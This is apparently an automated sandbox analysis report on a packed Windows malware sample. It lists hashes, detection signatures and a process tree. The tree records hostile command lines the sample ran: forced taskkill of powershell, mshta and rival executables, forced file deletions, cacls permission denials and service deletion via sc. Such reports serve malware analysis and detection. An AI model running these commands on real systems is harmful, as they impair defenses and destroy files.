a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6

General

Target

a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe
Size

372KB
MD5

6fcf1c2c331be34cf85ac994d5036359
SHA1

b776b975854a59862a16f8042353ae71554bdd3a
SHA256

a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6
SHA512

8338ed9d3a81716cab30da8b9a3a0e6e8ea876a668e1839edcf7b5f2a9632f93336142a9e4563d418fa1d176114f500476a33637bf8cad3c180a81e421d9581c

Score

8^/10

evasion upx

Malware Config

Signatures

Downloads MZ/PE file
Executes dropped EXE 1 IoCs

Processes:

sqlageatc.exe

pid process

1064 sqlageatc.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

pid	process
1064	sqlageatc.exe

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/memory/2496-115-0x00000000022C0000-0x00000000022CB000-memory.dmp	upx
behavioral1/memory/2496-118-0x00000000022C0000-0x00000000022CB000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\sqlageatc.exe	upx
C:\Users\Admin\AppData\Local\Temp\sqlageatc.exe	upx

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.

Kills process with taskkill 64 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
2820	taskkill.exe
3844	taskkill.exe
2820	taskkill.exe
4776	taskkill.exe
3204	taskkill.exe
3488	taskkill.exe
1908	taskkill.exe
3416	taskkill.exe
1480	taskkill.exe
1816	taskkill.exe
596	taskkill.exe
4580	taskkill.exe
4828	taskkill.exe
708	taskkill.exe
4680	taskkill.exe
3652	taskkill.exe
4532	taskkill.exe
2352	taskkill.exe
3944	taskkill.exe
4504	taskkill.exe
2348	taskkill.exe
1536	taskkill.exe
4948	taskkill.exe
4816	taskkill.exe
1304	taskkill.exe
1288	taskkill.exe
372	taskkill.exe
4436	taskkill.exe
1316	taskkill.exe
4200	taskkill.exe
4660	taskkill.exe
1988	taskkill.exe
4832	taskkill.exe
4500	taskkill.exe
2284	taskkill.exe
4252	taskkill.exe
3960	taskkill.exe
3500	taskkill.exe
2640	taskkill.exe
4848	taskkill.exe
1272	taskkill.exe
4064	taskkill.exe
2972	taskkill.exe
1168	taskkill.exe
3456	taskkill.exe
4260	taskkill.exe
2872	taskkill.exe
2900	taskkill.exe
3780	taskkill.exe
2972	taskkill.exe
3552	taskkill.exe
4300	taskkill.exe
1380	taskkill.exe
4664	taskkill.exe
4960	taskkill.exe
1700	taskkill.exe
1752	taskkill.exe
5048	taskkill.exe
4528	taskkill.exe
3944	taskkill.exe
4824	taskkill.exe
400	taskkill.exe
4328	taskkill.exe
3740	taskkill.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe

pid	process
2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe
2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe
2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe
2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe
2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe
2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe
2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe
2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe
2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe
2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe
2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe
2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe
2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe
2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe
2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe
2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe
2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe
2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe
2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe
2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe
2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe
2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe
2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe
2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe
2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe
2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe
2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe
2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe
2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe
2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe
2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe
2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe
2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe
2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe
2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe
2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe
2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe
2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe
2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe
2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe
2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe
2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe
2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe
2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe
2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe
2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe
2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe
2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe
2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe
2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe
2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe
2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe
2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe
2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe
2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe
2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe
2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe
2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe
2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe
2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe
2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe
2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe
2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe
2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exeConhost.exetaskkill.exetaskkill.exeConhost.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.execmd.exeConhost.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

description	pid	process
Token: SeDebugPrivilege	708	taskkill.exe
Token: SeDebugPrivilege	3204	taskkill.exe
Token: SeDebugPrivilege	3488	taskkill.exe
Token: SeDebugPrivilege	400	taskkill.exe
Token: SeDebugPrivilege	2868	taskkill.exe
Token: SeDebugPrivilege	1988	taskkill.exe
Token: SeDebugPrivilege	2640	taskkill.exe
Token: SeDebugPrivilege	2972	taskkill.exe
Token: SeDebugPrivilege	596	taskkill.exe
Token: SeDebugPrivilege	4064	taskkill.exe
Token: SeDebugPrivilege	2764	taskkill.exe
Token: SeDebugPrivilege	372	taskkill.exe
Token: SeDebugPrivilege	2144	taskkill.exe
Token: SeDebugPrivilege	3652	taskkill.exe
Token: SeDebugPrivilege	2820	Conhost.exe
Token: SeDebugPrivilege	1204	taskkill.exe
Token: SeDebugPrivilege	3552	taskkill.exe
Token: SeDebugPrivilege	4436	Conhost.exe
Token: SeDebugPrivilege	4532	taskkill.exe
Token: SeDebugPrivilege	4504	taskkill.exe
Token: SeDebugPrivilege	4580	taskkill.exe
Token: SeDebugPrivilege	4832	taskkill.exe
Token: SeDebugPrivilege	4664	taskkill.exe
Token: SeDebugPrivilege	4848	taskkill.exe
Token: SeDebugPrivilege	4328	taskkill.exe
Token: SeDebugPrivilege	4500	taskkill.exe
Token: SeDebugPrivilege	1184	taskkill.exe
Token: SeDebugPrivilege	4828	cmd.exe
Token: SeDebugPrivilege	2284	Conhost.exe
Token: SeDebugPrivilege	1168	taskkill.exe
Token: SeDebugPrivilege	2972	taskkill.exe
Token: SeDebugPrivilege	1316	taskkill.exe
Token: SeDebugPrivilege	4660	taskkill.exe
Token: SeDebugPrivilege	4960	taskkill.exe
Token: SeDebugPrivilege	912	taskkill.exe
Token: SeDebugPrivilege	1700	taskkill.exe
Token: SeDebugPrivilege	2348	taskkill.exe
Token: SeDebugPrivilege	4300	taskkill.exe
Token: SeDebugPrivilege	2352	taskkill.exe
Token: SeDebugPrivilege	1908	taskkill.exe
Token: SeDebugPrivilege	3740	taskkill.exe
Token: SeDebugPrivilege	3456	taskkill.exe
Token: SeDebugPrivilege	1752	taskkill.exe
Token: SeDebugPrivilege	1536	taskkill.exe
Token: SeDebugPrivilege	5048	taskkill.exe
Token: SeDebugPrivilege	4252	taskkill.exe
Token: SeDebugPrivilege	1012	taskkill.exe
Token: SeDebugPrivilege	4528	taskkill.exe
Token: SeDebugPrivilege	4180	taskkill.exe
Token: SeDebugPrivilege	4200	taskkill.exe
Token: SeDebugPrivilege	4784	taskkill.exe
Token: SeDebugPrivilege	4648	taskkill.exe
Token: SeDebugPrivilege	4948	taskkill.exe
Token: SeDebugPrivilege	3944	taskkill.exe
Token: SeDebugPrivilege	4040	taskkill.exe
Token: SeDebugPrivilege	3416	taskkill.exe
Token: SeDebugPrivilege	4260	taskkill.exe
Token: SeDebugPrivilege	1480	taskkill.exe
Token: SeDebugPrivilege	2316	taskkill.exe
Token: SeDebugPrivilege	2456	taskkill.exe
Token: SeDebugPrivilege	3844	taskkill.exe
Token: SeDebugPrivilege	4816	taskkill.exe
Token: SeDebugPrivilege	2872	taskkill.exe
Token: SeDebugPrivilege	5084	taskkill.exe

Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe

pid	process
2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe
2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 2496 wrote to memory of 3416	2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe	cmd.exe
PID 2496 wrote to memory of 3416	2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe	cmd.exe
PID 2496 wrote to memory of 3416	2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe	cmd.exe
PID 3416 wrote to memory of 708	3416	cmd.exe	taskkill.exe
PID 3416 wrote to memory of 708	3416	cmd.exe	taskkill.exe
PID 3416 wrote to memory of 708	3416	cmd.exe	taskkill.exe
PID 2496 wrote to memory of 3824	2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe	cmd.exe
PID 2496 wrote to memory of 3824	2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe	cmd.exe
PID 2496 wrote to memory of 3824	2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe	cmd.exe
PID 3824 wrote to memory of 3204	3824	cmd.exe	taskkill.exe
PID 3824 wrote to memory of 3204	3824	cmd.exe	taskkill.exe
PID 3824 wrote to memory of 3204	3824	cmd.exe	taskkill.exe
PID 2496 wrote to memory of 3192	2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe	cmd.exe
PID 2496 wrote to memory of 3192	2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe	cmd.exe
PID 2496 wrote to memory of 3192	2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe	cmd.exe
PID 3192 wrote to memory of 3488	3192	cmd.exe	taskkill.exe
PID 3192 wrote to memory of 3488	3192	cmd.exe	taskkill.exe
PID 3192 wrote to memory of 3488	3192	cmd.exe	taskkill.exe
PID 2496 wrote to memory of 3808	2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe	cmd.exe
PID 2496 wrote to memory of 3808	2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe	cmd.exe
PID 2496 wrote to memory of 3808	2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe	cmd.exe
PID 2496 wrote to memory of 3996	2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe	cmd.exe
PID 2496 wrote to memory of 3996	2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe	cmd.exe
PID 2496 wrote to memory of 3996	2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe	cmd.exe
PID 2496 wrote to memory of 3336	2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe	cmd.exe
PID 2496 wrote to memory of 3336	2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe	cmd.exe
PID 2496 wrote to memory of 3336	2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe	cmd.exe
PID 2496 wrote to memory of 3284	2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe	cmd.exe
PID 2496 wrote to memory of 3284	2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe	cmd.exe
PID 2496 wrote to memory of 3284	2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe	cmd.exe
PID 2496 wrote to memory of 1200	2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe	cmd.exe
PID 2496 wrote to memory of 1200	2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe	cmd.exe
PID 2496 wrote to memory of 1200	2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe	cmd.exe
PID 1200 wrote to memory of 400	1200	cmd.exe	taskkill.exe
PID 1200 wrote to memory of 400	1200	cmd.exe	taskkill.exe
PID 1200 wrote to memory of 400	1200	cmd.exe	taskkill.exe
PID 2496 wrote to memory of 1696	2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe	cmd.exe
PID 2496 wrote to memory of 1696	2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe	cmd.exe
PID 2496 wrote to memory of 1696	2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe	cmd.exe
PID 2496 wrote to memory of 3188	2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe	cmd.exe
PID 2496 wrote to memory of 3188	2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe	cmd.exe
PID 2496 wrote to memory of 3188	2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe	cmd.exe
PID 2496 wrote to memory of 1140	2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe	cmd.exe
PID 2496 wrote to memory of 1140	2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe	cmd.exe
PID 2496 wrote to memory of 1140	2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe	cmd.exe
PID 2496 wrote to memory of 1228	2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe	cmd.exe
PID 2496 wrote to memory of 1228	2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe	cmd.exe
PID 2496 wrote to memory of 1228	2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe	cmd.exe
PID 2496 wrote to memory of 1428	2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe	cmd.exe
PID 2496 wrote to memory of 1428	2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe	cmd.exe
PID 2496 wrote to memory of 1428	2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe	cmd.exe
PID 1428 wrote to memory of 2868	1428	cmd.exe	taskkill.exe
PID 1428 wrote to memory of 2868	1428	cmd.exe	taskkill.exe
PID 1428 wrote to memory of 2868	1428	cmd.exe	taskkill.exe
PID 2496 wrote to memory of 1780	2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe	cmd.exe
PID 2496 wrote to memory of 1780	2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe	cmd.exe
PID 2496 wrote to memory of 1780	2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe	cmd.exe
PID 1780 wrote to memory of 1988	1780	cmd.exe	taskkill.exe
PID 1780 wrote to memory of 1988	1780	cmd.exe	taskkill.exe
PID 1780 wrote to memory of 1988	1780	cmd.exe	taskkill.exe
PID 2496 wrote to memory of 2164	2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe	cmd.exe
PID 2496 wrote to memory of 2164	2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe	cmd.exe
PID 2496 wrote to memory of 2164	2496	a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe	cmd.exe
PID 2164 wrote to memory of 2640	2164	cmd.exe	taskkill.exe

C:\Users\Admin\AppData\Local\Temp\a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe
"C:\Users\Admin\AppData\Local\Temp\a0c1f927cfcafa7a279dcc11a75984cd8e93afa07fcf8c8a903fb296d09878e6.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2496

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im wscript.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:3416

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im wscript.exe
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:708

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im SQLAGENTSWD.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:3824

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im SQLAGENTSWD.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3204

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im exp1orer.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:3192

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im exp1orer.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3488

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\ProgramData\exp1orer.exe
2⤵
PID:3808

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\RECYCLER\exp1orer.exe
2⤵
PID:3336

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\Users\exp1orer.exe
2⤵
PID:3996

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:/RECYCLER/exp1orer.exe
2⤵
PID:3284

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im expl0rer.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:1200

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im expl0rer.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:400

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\ProgramData\expl0rer.exe
2⤵
PID:1696

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\RECYCLER\expl0rer.exe
2⤵
PID:1140

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:/RECYCLER/expl0rer.exe
2⤵
PID:1228

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\Users\expl0rer.exe
2⤵
PID:3188

C:\Windows\SysWOW64\cacls.exe
Cacls conhoy.exe /t /e /c /d system
3⤵
PID:4604

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im mshta.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:1428

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im mshta.exe
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2868

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im powershell.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:1780

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im powershell.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1988

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\Temp\sqlageatc.exe /e /t /g system:f
3⤵
PID:4508

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im Diskraid.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:2164

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Diskraid.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2640

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q %systemroot%SystemBols\Diskraid.exe
2⤵
PID:3036

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\Windows\SystemBols\Diskraid.exe
2⤵
PID:3252

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im Sqltem64.exe
2⤵
PID:1692

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Sqltem64.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2972

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q %ProgramFiles%\Microsoft SQL Server\Sqltem64.exe
2⤵
PID:2468

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\Program Files\Microsoft SQL Server\Sqltem64.exe
2⤵
PID:1812

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\Program Files (x86)\Microsoft SQL Server\Sqltem64.exe
2⤵
PID:3136

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im Diskraid.exe
2⤵
PID:3820

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Diskraid.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:596

C:\Windows\SysWOW64\cmd.exe
cmd /c sc delete "dorporati windows dribe diskraid"
2⤵
PID:2856

C:\Windows\SysWOW64\sc.exe
sc delete "dorporati windows dribe diskraid"
3⤵
PID:1304

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
PID:3556

C:\Windows\SysWOW64\cmd.exe
cmd /c sc delete "dorporati windows dribe diskraid"
2⤵
PID:3504

C:\Windows\SysWOW64\sc.exe
sc delete "dorporati windows dribe diskraid"
3⤵
PID:2760

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im AppVNice.exe
2⤵
PID:708

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im AppVNice.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4064

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q %systemroot%SystemBols\AppVNice.exe
2⤵
PID:3828

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\Windows\SystemBols\AppVNice.exe
2⤵
PID:3348

C:\Windows\SysWOW64\cacls.exe
Cacls rundlls.exe /t /e /c /d system
3⤵
PID:4564

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im Systen64.exe
2⤵
PID:704

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Systen64.exe
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2764

C:\Windows\SysWOW64\cmd.exe
